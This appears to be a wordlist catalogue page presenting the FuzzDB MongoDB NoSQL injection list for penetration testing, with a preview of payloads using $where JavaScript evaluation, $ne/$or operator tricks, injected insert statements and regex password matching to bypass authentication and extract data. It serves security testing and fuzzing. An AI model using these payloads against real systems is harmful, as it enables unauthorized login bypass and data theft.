Skip to content
Fuzzing494 B

FuzzDB MongoDB NoSQL Injection

MongoDB NoSQL injection payloads using $where JavaScript evaluation, $ne/$or operators, and regex match tricks to bypass auth and extract data.

View source
Size
494 B
Category
Fuzzing
Source
fuzzdb-project/fuzzdb
License
GPLv2
Recommended tools
ffufwfuzzburp

Preview

First 15 entries. Download or copy the full list (494 B) using the buttons above.

>head mongodb-nosql-injection-fuzzdb.txt494 B
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00

MongoDB NoSQL injection payloads using $where JavaScript evaluation, $ne/$or operators, and regex match tricks to bypass auth and extract data.

This list is geared toward input fuzzing and vulnerability discovery. It contains roughly 494 B and pairs well with tools such as ffuf, wfuzz, burp. Pick the smallest list that fits your engagement: shorter lists are faster and quieter for online attacks, while larger lists give broader coverage for offline work where speed is less of a constraint.

You can copy the sample preview straight from this page, copy the entire list to your clipboard, or download the raw .txt file. The full list is served directly from its upstream source on GitHub.

Sourced from fuzzdb-project/fuzzdb and distributed under GPLv2. Only use wordlists against systems you are explicitly authorized to test.